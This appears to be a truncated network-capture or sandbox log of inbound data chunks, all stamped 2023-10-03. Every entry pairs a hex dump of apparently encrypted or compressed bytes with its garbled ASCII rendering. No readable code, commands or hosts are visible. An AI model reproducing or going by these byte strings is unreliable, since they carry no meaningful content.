2023-10-03 20:34:59 UTC	1409	IN	Data Raw: c7 f0 f7 d9 15 f3 f2 b2 7c 02 8f 7d 1f d3 3e 1e be ca be 76 91 93 64 8d 1d 6c 43 31 ca a8 b0 c5 96 d5 04 5f 94 52 57 93 7b 5e 3d fc 28 5d 13 d0 ef ea ed 2b bb eb ce 56 66 ae e6 85 98 4b a7 d9 40 65 c2 53 ce 5f 67 5d 41 01 6d 56 d4 4a ea 8d c4 39 a7 dc 44 f3 d8 f4 8f 55 a4 91 d1 0c 1f cc 13 44 13 c2 ce e7 84 38 e0 33 1d 66 3f e0 59 7f e8 3b fb 45 42 c1 6c d8 42 54 14 61 75 51 d4 fd 88 4a 54 c5 ef 49 8e c1 48 b2 46 46 ef a1 e0 30 e9 39 6a cc 0a a1 ba 89 68 7b b4 34 44 57 ef 8d a6 42 89 4a e7 b0 33 99 8d 5f fb e9 05 d0 cf 35 2a b8 4b 4b 4c 7f 3e dd a1 93 16 ad 81 69 23 51 d6 d0 89 2e d4 a3 88 b2 71 6d 2c 66 11 05 34 d0 92 99 60 cb ba 56 d8 04 ec 8a 28 ff 34 22 a3 ee 97 6b d9 f7 11 ff 57 a8 40 16 a8 6a 06 d9 9f 89 09 ed c1 5c e4 67 ff 6b f3 5b 38 37 77 26 2d Data Ascii: \|}>vdlC1_RW{^=(]+VfK@eS_g]AmVJ9DUD83f?Y;EBlBTauQJTIHFF09jh{4DWBJ3_5*KKL>i#Q.qm,f4`V(4"kW@j\gk[87w&-
2023-10-03 20:34:59 UTC	1425	IN	Data Raw: 40 35 8d e7 7e 6f f7 c0 94 ed db 3f d2 5f 3f 0e c5 d9 a8 b8 c5 ab 1b e7 93 a5 87 72 45 0a 2a 50 f9 cd 7f 31 93 ab 67 f0 82 63 09 a3 53 c4 4a 12 b4 40 cc d5 5a 2d d1 3b 56 9d 46 31 2e 3a 14 62 f8 30 95 87 da 8b 7f 43 64 23 80 bd fc f9 88 5f 24 0a 72 62 82 70 10 66 bb 04 ac 00 0c 1d 2b d4 9e bc 18 20 cf 49 33 c1 78 f4 43 06 a3 7e 08 17 88 3e aa 18 c3 79 23 a3 67 ea 37 51 1b 6c 69 98 8d 7d 5b b2 8e b1 37 d9 45 8d 5c 56 69 61 56 d1 bd c6 7c 2c 73 f9 b3 74 39 52 82 a0 5f 14 ff ae 61 7c 73 16 0d 33 f2 9d c2 fe f0 a3 6c cc 74 07 5c 1c cb 3a fa 6a a1 49 0c 85 11 9e ff 34 9f f8 33 29 91 70 06 cd 63 15 05 40 12 ea 3c fe 47 f7 7d 6b 60 e1 e0 59 ae 24 ae 46 64 32 c0 a0 42 18 3b fe 26 3c 91 32 d0 99 3f 5c 1c 76 99 ed 50 f0 17 aa f8 5e 52 d9 06 c0 0b a3 99 ee 55 96 25 Data Ascii: @5~o?_?rE*P1gcSJ@Z-;VF1.:b0Cd#_$rbpf+ I3xC~>y#g7Qli}[7E\ViaV\|,st9R_a\|s3lt\:jI43)pc@<G}k`Y$Fd2B;&<2?\vP^RU%
2023-10-03 20:34:59 UTC	1441	IN	Data Raw: cc a8 02 6f a4 0c 7e 39 f8 3c 55 3f dd c2 d9 41 35 27 32 4d ea c0 53 7c 85 49 e2 c9 f2 14 33 06 35 f8 4d c9 98 a1 a6 3f 91 ee 4b 65 37 9b bc 6d 5e 6d 26 a0 c6 a5 c9 95 bd 02 4c 8e 19 15 ec bc 4f 30 e7 4c dd 8a 17 15 1b 6f 4e f6 94 cd 82 06 79 93 bc 83 5c 46 51 b0 a8 1c 62 fc 54 b0 ef 67 b9 d7 24 d7 22 d4 24 aa 51 9e 25 bf 53 94 12 83 9b 65 13 9f 07 7f 89 01 c0 ad 7d f5 12 73 48 b2 73 a8 06 a6 b3 6f 22 24 f5 6f bf 05 46 6b ab 0b eb bc fe 3f 0b 36 58 cb bb e8 00 9e fd f5 4a 9d 64 9b cc 29 98 36 59 72 e3 92 a7 2d d3 c0 db 59 31 c2 4e c8 4d ac 19 ba ab ac db ed 0b fc d6 f6 f2 3d 82 f1 77 6e b1 a9 f2 c7 c2 97 8f 16 79 48 e4 31 35 ff cb 09 b6 f7 46 47 5a 49 2d 9c 3e 9e c6 89 b6 43 4a aa 9a cc 9a 6f aa a1 5b 48 b1 c6 32 b2 e9 73 cb 16 73 79 e6 86 fa ed 6b 80 03 Data Ascii: o~9<U?A5'2MS\|I35M?Ke7m^m&LO0LoNy\FQbTg$"$Q%Se}sHso"$oFk?6XJd)6Yr-Y1NM=wnyH15FGZI->CJo[H2ssyk
2023-10-03 20:34:59 UTC	1457	IN	Data Raw: f1 0b 01 74 9b 6f 71 1b 78 96 8b 45 dc 1c 68 2c 35 4f d9 56 02 bf db 29 c9 0c ba 46 2e 56 50 65 70 26 8c 90 7a 48 a2 f7 cf 3a 60 2e a3 3a 92 bb f2 de 02 39 31 38 17 77 6e f4 9e 80 67 08 db 4e 2d 5c 5a cb d1 2d 2f 4f f4 92 a6 27 63 5c 7e 85 af 02 3f 90 8b e3 13 fd b4 23 6a 80 e9 20 cb 0c df fb a8 ef fc 27 46 25 2c 86 58 4b 2d bc a4 1a e4 1c 96 99 44 48 ef e8 15 94 4d 85 db 9a b7 01 19 7c 2f 32 a6 71 b8 af 7b a0 12 ad 88 81 bd 5d 90 df ea 9c 4b f4 dd a0 39 a8 9b bc 1b 1a c5 1b 4b a2 71 de 6d 54 2c 7c 8b 33 b0 96 5f 88 a3 df df 8d c6 73 94 ef 5b 20 07 69 f8 46 7c c7 dd 16 22 8e fd fd ad 9a 3e 16 f6 17 d2 1d d6 b2 b2 8c 2e 4c e0 0d 1a 72 f8 2c 99 dc 52 65 cb 36 34 79 da 8a 1d 55 a0 83 8d 94 88 41 94 11 6e a2 85 85 26 78 16 f6 df 8d b2 16 71 ab b0 72 1e a0 32 Data Ascii: toqxEh,5OV)F.VPep&zH:`.:918wngN-\Z-/O'c\~?#j 'F%,XK-DHM\|/2q{]K9KqmT,\|3_s[ iF\|">.Lr,Re64yUAn&xqr2
2023-10-03 20:34:59 UTC	1473	IN	Data Raw: 37 e1 4b 8e e8 14 ee 08 1e 2d 68 13 77 fb 5f 87 9f d7 ba d2 78 d8 59 c2 6a 34 34 48 e1 01 0b 8d c6 ab e4 18 c3 dc 49 84 d9 bd a1 3b 04 26 54 d0 ac 9b a3 e6 69 db 98 4d 0a a1 bc 15 b7 c0 2d 44 a2 04 52 c5 6e 0b b3 14 91 d8 dd 10 16 0c da 14 5f 55 62 56 51 14 8d c2 b4 e7 98 e9 f0 c0 9b 9e a6 60 23 c5 74 98 83 c6 7d 4e c6 0a 48 72 55 a4 9d ee c8 7e e6 75 77 9a 6c 04 68 d3 36 df 33 fd b9 7c fb e2 b7 14 cf 5c 46 50 96 48 27 8e 4b 63 18 5e 4f 7a 2a 4d f9 17 9b 7a 31 df a3 62 68 b9 20 4f 42 83 2e f4 af fb 89 cc f3 a5 7f 7f 95 c7 bb 8e b6 e2 78 e3 2a b2 e5 63 6b 38 0b 0a bb ce f0 46 d3 5a 28 3a 87 6a 0c 64 54 a1 1e 23 4f 07 bc c9 d4 b5 25 4a 93 06 3b 8f ce 85 b6 36 f3 a4 86 e5 e8 78 a4 e0 3b 9e 11 af d8 f0 e4 cd 99 9e f3 97 b0 7d 35 82 7a 7b 8f 24 4a d5 e1 02 13 Data Ascii: 7K-hw_xYj44HI;&TiM-DRn_UbVQ`#t}NHrU~uwlh63\|\FPH'Kc^OzMz1bh OB.xck8FZ(:jdT#O%J;6x;}5z{$J
2023-10-03 20:34:59 UTC	1489	IN	Data Raw: 59 b3 aa 27 38 c6 f5 ee 5e 49 b3 ba 9b c5 32 92 54 f9 8f 04 aa 6c a4 b9 52 a3 0b a4 3c 5a df 44 23 0b d8 c0 15 b9 b6 73 20 fb 9f d9 98 f1 5d ca d5 0e ee 37 29 52 9a 55 aa f5 b9 c4 c7 b7 26 9a 18 6a 6d 23 ca 51 59 a1 d0 df 14 fc fe 6a a2 0c d5 af 74 b6 85 1d e5 3d ed 08 9a e2 84 dc 93 66 47 0d 30 ce 5f e3 8d c9 13 d5 e2 45 6a 76 be b2 70 0a f5 bb 49 fb 29 a4 51 a9 6f 95 c7 a6 50 12 8a 89 b2 0f cd a7 a0 e7 6a f1 c6 58 9b ab 79 37 28 80 ee 8a d3 a6 e8 ad f8 6e 8e ab 60 50 a1 d8 58 1a 80 f6 b9 7b 86 e7 f2 c1 54 de 93 9e e9 0e 70 03 ea 79 5f 8f 1d 3e e3 41 2b d4 15 d5 c8 b1 89 48 7d 70 0c a8 57 b8 d5 a7 96 d7 35 95 19 bd f8 dd 3b 4d 77 2b b4 7e 97 fe 6b 39 9d 2d cd 93 46 6f 6e 9a 3e 9a fa c0 81 8e a8 45 15 42 85 b7 9c 6f 42 a4 3c 95 77 bd 52 a2 e5 65 9e df 4a Data Ascii: Y'8^I2TlR<ZD#s ]7)RU&jm#QYjt=fG0_EjvpI)QoPjXy7(n`PX{Tpy_>A+H}pW5;Mw+~k9-Fon>EBoB<wReJ
2023-10-03 20:34:59 UTC	1505	IN	Data Raw: d7 d2 d8 63 3c 6c 42 de 3d dc c2 70 99 b6 17 7a 04 98 64 ac ca 30 8f c3 11 65 53 38 8e 9b 17 a7 d3 97 a2 74 8a 05 7c 4d b2 a7 c8 f6 fd f4 e6 55 07 a3 61 c4 1e c7 c0 24 07 d2 1d eb 06 c2 07 27 cf 32 a8 bf d7 7f 91 ef 65 be eb 58 58 d8 55 ff 55 d3 3e 47 4c 3e 32 00 e4 44 fc e8 16 d7 e8 18 9b 5d d6 0e e3 b7 16 35 5a 99 8c a3 d8 0e 90 b6 46 9e 44 c0 11 85 78 48 40 0c 8a 31 ce 7b 34 52 0a 64 42 d0 e2 2d af 6b 5e 69 60 c8 5e fb 66 6f f4 cd c9 00 99 ea 89 ee 0a cc 65 6f 54 6f 54 35 64 f9 14 c9 35 7a e5 f7 88 c0 8f 60 45 3c f2 43 e3 5f 5d fe 7b 10 2b 84 8b cc 82 a1 f6 f1 2c 7e f7 5f be 4c f2 37 6d a5 a6 61 fd bc bb 8a 61 eb 3a f0 06 bf c6 3c a8 02 b2 2c 5d 44 87 cd 53 2c ac b8 cc 52 bf 78 7d e7 78 08 5f 38 fd c8 fd 42 a9 62 94 91 71 80 f8 9f 08 e3 be 10 45 1a 95 Data Ascii: c<lB=pzd0eS8t\|MUa$'2eXXUU>GL>2D]5ZFDxH@1{4RdB-k^i`^foeoToT5d5z`E<C_]{+,~_L7maa:<,]DS,Rx}x_8BbqE
2023-10-03 20:34:59 UTC	1521	IN	Data Raw: ba eb ac 4b 51 6a f1 6f 52 9e 40 b6 0e 96 73 86 16 d8 57 11 33 17 8c 07 7b 34 cc 6d c0 4f 6b 0f 13 2c 72 24 3a 8e 5f 23 3d 25 89 4a 5d 8f ac 2a d5 e6 89 66 81 21 f0 7e 8c 3e 4c e7 04 e0 cc 8d 28 b8 c0 c9 1e ea b8 7c 29 b9 45 c6 58 7e c1 5f 82 b1 53 4c 8a ca 33 1a 47 2c bf 6c 86 41 3c f2 1a 56 77 32 e8 af 92 9f a3 2f 68 18 6a 4c 29 15 48 af 6b 24 42 20 c8 b6 b1 39 f0 b5 11 d7 5f a3 46 08 61 e0 af 4a 24 6f 2a db 92 82 8c 98 60 2f 55 e2 40 e2 fc d1 00 f3 18 80 8e 65 b7 e6 55 67 cc 76 fb 12 e9 cc 0c fe 89 3c 5a 6b e6 f7 5c 48 18 ed fc 29 fa e6 84 3b ac 5a 25 a3 8a 3e e7 74 37 04 fa 07 cc 90 de 27 b6 dc 4f 6a f7 08 30 8a 23 12 df 6a 55 5f d3 9d d4 7d 16 10 a5 b4 e1 f9 c7 0e 45 c5 3e 08 da 87 ae cf 9e df 0a bd 40 90 cf c6 48 48 c7 e4 0f 3b fc 3c b7 78 ac 5c b4 Data Ascii: KQjoR@sW3{4mOk,r$:_#=%J]f!~>L(\|)EX~_SL3G,lA<Vw2/hjL)Hk$B 9_FaJ$o`/U@eUgv<Zk\H);Z%>t7'Oj0#jU_}E>@HH;<x\
2023-10-03 20:34:59 UTC	1537	IN	Data Raw: cb 82 e5 a0 3e 7b cb ff f5 9b 9a a3 1a 53 1b 0a 1e e0 0e e3 c6 c1 07 b9 b1 4d 40 fb a7 f6 7b f6 6f a7 ed b7 7f 0a 5d d5 a1 d2 30 61 33 53 46 31 13 91 d1 e3 af b1 ab eb b0 02 0d 1b c9 1d 31 1b 39 02 35 db 5a e7 31 ea fb 2e b3 24 00 8e 8a 31 dc 04 9e eb 5f 5d 03 c9 eb 6c a4 3f 2c 64 83 96 63 d3 a0 9f 58 87 8e 6c 69 de 4f 9f c9 82 9c 13 ab 5d 8c 45 cb 7e 62 ad e8 5b 8c f4 a7 27 26 15 f9 31 a0 6e 3f 98 cf b7 9f 8c 67 db 4f a6 b3 ed 27 c3 d9 f6 13 d9 ec f9 89 e5 f5 db 7f a2 da b7 fe 17 ce b7 ff 77 63 bd f8 ff 0d 89 37 1f c5 7f 37 45 89 8c 37 a2 c4 c7 db 91 62 ed bf a9 d0 2f fe 03 07 a2 a5 1f 67 ec 74 e5 97 27 a3 ff 22 6c 11 5c d4 6c 64 ff 5b 7c 40 c1 f2 31 17 a6 71 b0 bf f8 a7 83 fa 1f 2f a1 ee c4 4d 7d 23 a3 b5 4f ae b0 ea 46 75 38 35 93 3a fe 1d a2 0e a1 c6 Data Ascii: >{SM@{o]0a3SF1195Z1.$1_]l?,dcXliO]E~b['&1n?gO'wc77E7b/gt'"l\ld[\|@1q/M}#OFu85:
2023-10-03 20:34:59 UTC	1553	IN	Data Raw: 3e c8 d8 28 86 87 64 1b bd 3e 1f 1d 58 e1 4a e2 a8 e0 03 4c 41 19 ac e2 ed d6 35 a1 98 74 9c 71 a2 36 38 6a 6c 19 85 f1 50 46 61 82 fa 26 82 8a cf 51 74 e1 bd fb 8e b8 66 68 8c 2c 1f 56 62 cd 47 8c 36 38 ec 94 fd 4f 6e 3b 0f 84 ae 12 2d 13 77 18 b9 29 e4 2a 56 a2 fc c0 f3 47 b5 1a e3 df 30 e6 28 6c 21 34 04 ef 30 c0 9c 6d df 23 1b 2f 1c 64 8c bb a3 65 24 7d e7 23 b5 12 8c eb d4 1b 18 b7 e8 07 ed 08 59 2f 1a d0 64 a6 ec 30 09 b0 35 51 93 95 ed 22 00 33 fd 5d 15 09 c4 c0 e1 3d cd 29 06 13 7c c2 e7 c1 7d f5 f2 d5 87 16 73 cb 59 0c 5d 34 39 db 43 98 9f 22 32 1e 68 9b a4 98 c4 05 4f 32 ff b6 b8 f9 f0 ff fc 7c 88 91 b5 14 f6 ca 62 40 e9 62 84 00 ba ae 25 64 dc 4b 29 e4 37 63 43 58 22 9b 09 6d 69 28 46 a5 39 f9 14 5a a8 d3 1c 5d 30 bd 5c db 76 2a 20 6f 2f 6e ca Data Ascii: >(d>XJLA5tq68jlPFa&Qtfh,VbG68On;-w)VG0(l!40m#/de$}#Y/d05Q"3]=)\|}sY]49C"2hO2\|b@b%dK)7cCX"mi(F9Z]0\v o/n
2023-10-03 20:34:59 UTC	1569	IN	Data Raw: d6 5f 8d 00 f1 ae fe 6a 68 db a3 1b 7e 7c 42 43 28 7f a2 15 72 48 fb b5 5d 7a cb c4 0c bb 39 08 2e b7 d6 c7 0a 53 3d 7b 6f e4 73 be 7e 58 8e cb 74 bf 44 97 2a 4d 17 63 17 5c 22 6b 2b 54 f5 62 2a 58 b3 5b 44 3f a9 ea c6 71 77 e7 d2 8f 92 53 a9 f4 5c 4e 2e 77 90 d1 0f ea 37 ea 85 03 c8 b8 87 db 7c 5e 97 6e 68 ff d4 78 7b 73 50 c0 e1 08 28 5c 5c 1c 43 14 5c 16 53 83 5b b6 f8 9c 32 15 3f 51 a2 b7 4c cf fd b1 0f 97 b2 1a 8d 9a 52 1a 58 df 4c 5e ba 58 6f df 1d fa 56 6a bc 53 f4 1b 60 81 a0 7a f4 9d c6 37 fa a1 21 19 dd 1e 55 c8 0c 49 a6 c2 ae be 15 f7 93 54 cb b9 f0 d0 1d f9 d1 a1 69 e7 8e f3 e1 87 91 ee e4 0c 2b ac d1 c9 7c 8f b3 85 06 17 8a d7 02 13 98 12 79 d1 4c 99 10 58 97 f1 3a 08 f6 f1 d9 89 d1 f7 bb d7 7e af ec 7e c8 78 cf 49 09 71 27 2e 2e 65 46 21 88 Data Ascii: _jh~\|BC(rH]z9.S={os~XtDMc\"k+TbX[D?qwS\N.w7\|^nhx{sP(\\C\S[2?QLRXL^XoVjS`z7!UITi+\|yLX:~~xIq'..eF!
2023-10-03 20:34:59 UTC	1585	IN	Data Raw: ca 43 95 e4 b7 7e d0 ac 3a 83 aa 6d 56 37 1b 9f bd 35 be 37 cb e2 1d e4 f4 71 bd 8e 58 ae 76 e6 ad 24 99 52 e4 51 f3 66 0a 1c 50 78 82 e3 45 b0 e0 d9 10 70 3b 6e e2 13 03 b5 0c d4 21 cb c8 85 be 5b 28 65 a8 e9 8c 0c ea 75 cd 35 d0 9c b5 6e 51 10 b7 41 8a 1f a5 c9 51 f4 2f 46 eb 88 5a 50 2d b6 9f 47 b0 2a 93 30 3e 27 67 34 89 27 f7 22 79 97 4a 02 71 57 63 e2 6b b7 6c ec 09 71 36 4f 25 33 e4 ba ea 7c ea cc 65 65 56 02 c1 ad de e6 ac e2 ce eb 6d 97 12 f2 40 cb 22 1b 6a 97 ba 89 4f 3d fc 48 25 30 79 3f 49 87 c3 ec 7b f5 29 f6 86 d2 e3 3e 21 ff b4 a6 c1 89 b1 dc b2 f0 c7 dd c4 86 b8 11 5b 38 28 b2 f0 08 0b f8 7f f9 5c 5c dd fe 2e b7 0c bd 52 6d 17 b0 68 ef 59 1e 39 b3 8e 67 30 03 9a 4e 31 1c 80 50 19 e5 1e 89 47 d0 73 99 86 d3 d6 8b b5 7f af 14 f2 f6 d9 6c 83 Data Ascii: C~:mV757qXv$RQfPxEp;n![(eu5nQAQ/FZP-G*0>'g4'"yJqWcklq6O%3\|eeVm@"jO=H%0y?I{)>![8(\\.RmhY9g0N1PGsl
2023-10-03 20:34:59 UTC	1601	IN	Data Raw: 5b b7 23 83 bd db 22 ab 0c 5f 83 8e 0f 76 45 3e 2d fb 91 e2 ff 82 89 bd 8c 0a 38 4c c0 8b f5 f5 c8 db d2 ba 74 9e cf a7 34 e4 61 1f cd 8d e4 a0 4c fe 41 3d 9d 70 13 22 8c c2 d3 e3 17 7a 66 4d ed 5b 35 0a 44 77 ac fd a7 f0 7a cf 54 0c 3d 50 1c de b6 d6 08 cd 7f 79 28 a0 5f e3 52 17 d7 94 81 a7 b9 61 27 cd 8d 5c 45 e8 8d 7b 42 e3 89 b3 71 86 c0 b1 4b c8 16 d5 6a ee 2e 13 15 b2 54 8a 5a 27 95 1c 75 91 41 db 6a ce 18 f4 3e 86 26 b3 e4 48 d8 c3 dd 0e 31 31 a8 b1 39 f4 05 b2 36 a4 9d 21 cd 2c d9 fc 13 24 4f ad 62 60 75 20 37 0c 94 18 5a a8 87 45 c6 c4 67 f5 18 e5 86 6c 16 cf a6 7d 8e ee af 15 8c 1c ac 43 2c 3a d2 21 cf 2c e8 9e 65 cf 46 f2 27 08 b2 66 7d 1b 2d 51 cc 25 44 0d 59 48 1b af 0c 02 47 2a 43 0b cc 61 05 11 ab 41 ac 73 65 d5 6d f1 14 d1 81 ea 7e c3 db Data Ascii: [#"_vE>-8Lt4aLA=p"zfM[5DwzT=Py(_Ra'\E{BqKj.TZ'uAj>&H1196!,$Ob`u 7ZEgl}C,:!,eF'f}-Q%DYHG*CaAsem~
2023-10-03 20:34:59 UTC	1617	IN	Data Raw: 43 dc 2f 36 c6 d4 1d cc 40 41 6b 69 ec b1 f6 8c fc 2e b7 7f 15 ce f1 21 36 02 1f 31 41 4e b1 71 b9 76 56 29 5e c7 3f b5 ad 5a 5e 1d 94 a4 b1 43 9e 3f 4c 85 58 d8 78 76 5e 61 11 b5 ef f2 87 c2 31 86 d1 43 8e cb 31 d2 94 dc 01 e0 2f 0c 26 ec 22 cb 22 4e 82 7c 36 ad bd 00 66 cf c5 eb 41 a9 72 ce d4 3f 58 fb be 27 e7 ef 18 51 93 e8 bc 3a 63 8e bd a4 64 dd e7 78 26 b0 a2 97 cd 9d 0e 5f 90 b3 8e 05 fe b0 e6 6a 07 7e e1 e5 a8 fe e3 5b 0d c1 e6 39 85 72 82 7d b2 a0 60 17 e8 3e e9 4e 93 e5 3c f1 48 e2 47 3c 37 57 49 12 b4 af e9 30 ad 0b bb ea e6 9d db 0c 35 d9 52 77 17 dd 53 09 44 38 7b 46 9d f9 81 3b 5d 46 62 c5 ea db b6 fa a0 69 3e b0 bd b4 ec 2b a5 ba b8 8b 2c 25 8d 59 08 43 07 51 e1 94 09 9f 5a c0 2f 44 7f b0 1a 66 c4 5e 40 1e e7 99 58 4f ec 38 1a 30 0d 70 6c Data Ascii: C/6@Aki.!61ANqvV)^?Z^C?LXxv^a1C1/&""N\|6fAr?X'Q:cdx&_j~[9r}`>N<HG<7WI05RwSD8{F;]Fbi>+,%YCQZ/Df^@XO80pl
2023-10-03 20:34:59 UTC	1633	IN	Data Raw: b5 3a 2f be 8b 4b b8 4e c4 e8 8d 86 f6 8f 7e 31 4f e9 95 46 3a 8b 55 18 50 80 3e fb a5 68 83 ea 4a 61 f7 79 51 f8 81 85 50 17 65 dd 72 64 2f 66 4c 47 a1 94 51 b4 cb 62 47 d8 11 a4 a4 77 bc 08 82 54 e3 55 3e ed ac 6e be 8f d2 4c 97 71 a7 b3 f3 c6 69 00 fc f5 e3 fe 20 cf 31 2b f3 06 77 b5 45 f5 ba 76 6d 31 26 7c 36 89 a5 fe 42 8e 64 15 2f b1 8a c6 c5 f1 43 98 13 cd dd 71 91 88 1e 7b 9f 19 4f 86 8c 32 1a 62 2c bb 30 b5 7d a2 e7 47 61 00 ef b6 a6 c3 09 b2 1b 1f 2d 05 34 30 33 86 4d 4d f8 92 ad 0f 63 71 1a 6b d0 a7 96 4c 71 d1 d1 31 14 14 4e f7 31 bf 54 4a 74 f5 69 37 d6 59 80 90 40 64 4b d7 07 fa 59 3d 9c 54 3f 92 65 53 14 9c 18 e4 2e 27 c6 14 d1 0f 83 cc fa 14 6e 18 7b 2c 9c da 9e bb da ff 94 c5 03 22 d5 c9 6c b8 1b e8 c2 49 8a f1 87 ef 98 1b 1d 8e 0b 78 c9 Data Ascii: :/KN~1OF:UP>hJayQPerd/fLGQbGwTU>nLqi 1+wEvm1&\|6Bd/Cq{O2b,0}Ga-403MMcqkLq1N1TJti7Y@dKY=T?eS.'n{,"lIx
2023-10-03 20:34:59 UTC	1649	IN	Data Raw: 21 2a 84 fc 41 44 2d f0 ac 39 cb 14 52 6a 38 23 a5 95 c3 0c 69 ee 94 a3 12 aa b8 ec 61 57 49 3c 2b 4f 99 13 5c ea f3 c3 06 aa 96 cc f1 3b b9 19 85 a6 ba 2a 1f 33 c7 23 85 4e 0b 4a e7 59 89 a8 b6 3b 77 61 4e fc 89 51 f5 e7 8e 8b f3 80 de 34 cc 53 d0 88 ec 1e ac 33 bb 50 0e 80 b2 43 73 a4 54 d2 7a 53 ad 24 36 91 ec c3 94 1a bb 88 88 87 95 76 a7 32 46 31 15 6c 8e b8 ac 19 a8 46 4c 0e 57 ea ec 10 7b 6d 4e 05 6a 95 31 db e3 9f 72 53 c4 7a fb 1c a7 14 dc c5 63 24 06 a7 a0 04 55 8a 7b 1f b0 d3 dd 24 d7 42 f5 20 a9 52 2c 15 de 26 0e de 9f 29 54 4a 6f 8c c8 94 a2 de 9f 50 d5 f8 f6 c5 9c 4a 14 1e 63 18 e1 ca c8 d8 f1 fe 54 a0 2a 08 29 65 78 e7 10 ac 0e 78 87 f6 94 a0 2c 88 29 b1 ca 2a fe 64 d4 4a 75 17 8b 71 4f 9c aa 97 8b 8f 51 09 f3 61 dc 51 44 f3 8e a1 2a b6 59 Data Ascii: !AD-9Rj8#iaWI<+O\;3#NJY;waNQ4S3PCsTzS$6v2F1lFLW{mNj1rSzc$U{$B R,&)TJoPJcT)exx,)dJuqOQaQD*Y
2023-10-03 20:34:59 UTC	1665	IN	Data Raw: cd 5b e2 a0 9d e9 33 73 7b 57 22 06 44 5d 82 bc 8b 48 b7 69 40 f6 72 9a e9 1f 20 03 35 96 54 28 eb 54 0a be 7c 3e 44 24 ca c0 06 1b 53 b7 34 40 6b d2 6d 09 f7 a0 a7 23 37 37 78 6f c9 a6 06 ac 61 3f 39 fa 8f fb c5 98 d7 97 83 d3 39 96 a1 6e e2 ae 2e 5e f8 ed 25 6f f3 7b 97 7d 59 70 c4 a4 44 f8 8e 8f f3 5b 5a 61 8a 1e cb 96 c3 87 51 93 2c 57 0e 4d 0c c7 20 17 f6 8e 3f 81 d1 48 0e 20 c6 e7 cb ff 2c 57 0e 39 7c 0d 30 da 74 ba 0d cb 5d d8 e5 55 32 1e cf ea ce 93 ca 2d 83 05 c9 9f bf 92 3a 7c b9 0b e6 d8 40 6a 5c e9 7a dd 67 4a b2 6b 47 5e 6b e5 70 fc e1 60 0c 55 d2 4a c2 49 b9 7c 58 d3 9f 69 a0 9a ff 86 88 b0 e8 1d 9c 48 49 a4 c6 e9 a9 24 2b 80 92 e9 32 33 2b 68 ff e2 ec cb 4f 97 b0 55 4b c6 80 51 80 84 9a 80 b7 2b 21 ae 24 b8 48 2a 63 8c ed e7 85 27 f9 03 98 Data Ascii: [3s{W"D]Hi@r 5T(T\|>D$S4@km#77xoa?99n.^%o{}YpD[ZaQ,WM ?H ,W9\|0t]U2-:\|@j\zgJkG^kp`UJI\|XiHI$+23+hOUKQ+!$H*c'
2023-10-03 20:34:59 UTC	1681	IN	Data Raw: 3f 02 8e 3a 7c 96 0f 73 f8 5a c3 9a 26 8c 98 62 5f f3 58 86 67 40 7d 99 e1 40 ec b5 60 78 6b 4e 6b 63 c0 53 3a a3 19 78 4b 47 8b ce 1a 6b 6a 5f 93 a3 51 fb 78 be 2a 3e 84 a6 2a 9e 3d 9d 85 d5 41 94 af 86 a1 ab 71 63 b4 07 11 b7 8c d2 c9 c9 0b 1e e0 f6 79 98 1e 4d 95 1c 33 eb fb 77 e9 b6 b2 f7 25 2b 41 c0 94 2a 23 59 a6 d5 8c c0 10 f1 3f 6d 01 dd 6c cc d7 74 13 e5 1a 11 b5 ad b3 42 40 c7 71 b0 24 dd 42 e4 8c b7 4b f6 67 c8 c6 ad 56 fe 77 cb 4f e0 15 01 e0 e1 19 30 1e 60 7d b2 26 03 a6 83 ee 10 a6 f6 ff 73 32 97 63 94 cf 04 b2 15 06 b8 38 62 cd f1 8b 92 1d 28 da 9a 1b 8c 2f b7 85 71 66 f9 0e f7 69 84 d4 e6 8c d2 d6 a7 db 90 2f 70 1b 6e b4 fb ad d6 db fc c7 91 ec fa 70 46 e8 e8 3e 53 52 f0 7b e7 6f 71 12 db f2 48 e7 c1 db 1e b9 34 ae 24 17 fc 88 be c5 cf 9e Data Ascii: ?:\|sZ&b_Xg@}@`xkNkcS:xKGkj_Qx>=AqcyM3w%+A*#Y?mltB@q$BKgVwO0`}&s2c8b(/qfi/pnpF>SR{oqH4$
2023-10-03 20:34:59 UTC	1697	IN	Data Raw: 03 7f 52 bb 0b 0d 17 02 e4 99 e0 5a df e5 3f e5 27 cc bc 65 03 5b 52 e6 4b 78 80 6d c7 21 2f 43 1a 16 ee 72 fc b2 3e 8e 96 c7 b9 97 40 62 3a 0c 05 b7 ee c4 57 02 fb cc 3d 00 49 5a e2 3a 5e 61 5e 31 85 f5 b0 9b e3 98 45 ce 6e e3 c4 2a a2 d1 08 c6 2b 86 62 2d d7 2e cd 2e c9 30 f4 f0 67 e0 ff 5a 12 eb d3 0a 86 fd 6f 96 3a 82 74 09 77 7b 8c 1c b0 52 4a b0 70 cb fe 5e b4 bc 0f 21 ec 4c f8 9f de a3 f4 73 4e 07 d0 74 26 4c 67 83 a0 ec 26 6d 49 a2 b3 80 b7 6f 93 c5 55 13 8e 7b 19 8e 4a 2c 95 1b b0 06 68 a7 e0 1a 10 cf 71 b0 99 a3 07 c3 37 a8 da 7d f2 f4 97 09 86 26 74 71 d0 88 68 5c fc a8 75 1f 99 5d 30 1e cc c6 a5 6d 33 d5 83 b3 b4 6a a9 05 03 10 4b f5 39 47 f0 0e a8 8e 22 7c e3 8a 23 c1 fa 0b 9c db 93 b4 34 3b e9 6c f6 c4 66 a7 cb b5 4b 81 3d 1b df 15 6a 7d c1 Data Ascii: RZ?'e[RKxm!/Cr>@b:W=IZ:^a^1En*+b-..0gZo:tw{RJp^!LsNt&Lg&mIoU{J,hq7}&tqh\u]0m3jK9G"\|#4;lfK=j}
2023-10-03 20:34:59 UTC	1713	IN	Data Raw: e4 98 a8 a2 c5 9b ac 1f 14 ac fb 63 51 99 a4 50 29 35 85 95 01 76 2d 47 f5 26 95 0d f5 65 20 de 4a d7 ce 88 2b 1b b5 8f 6a 7d 96 0e 00 ad b8 0c b2 b1 14 ed 5e 8e 4a 44 48 27 8d b0 a0 4e 87 9b e9 46 c2 c4 40 75 03 1b 78 3a e7 2d 46 ae 8d e1 da 5a f4 74 5f 9e 85 2b b4 ec 9b 80 50 b6 61 12 c4 5c da bf ac 08 dc 4c 2e 2f 91 29 22 1a 2c 34 03 17 1d 44 67 e4 ce 79 88 ce 89 97 a1 0d 80 d9 2c 34 8f d8 a3 f0 32 9c 5b de d0 ee 69 56 7b a5 c2 cc 67 88 73 84 12 c7 96 23 19 14 15 8f 5c 16 3a 9f 2e 61 9b 6e 62 b3 3b c7 b6 d2 68 92 ee 43 ef 5d 06 75 96 2f 28 47 46 d0 b8 d3 8f 03 81 c3 b5 69 a7 c8 7d d7 d0 ba c2 24 41 94 12 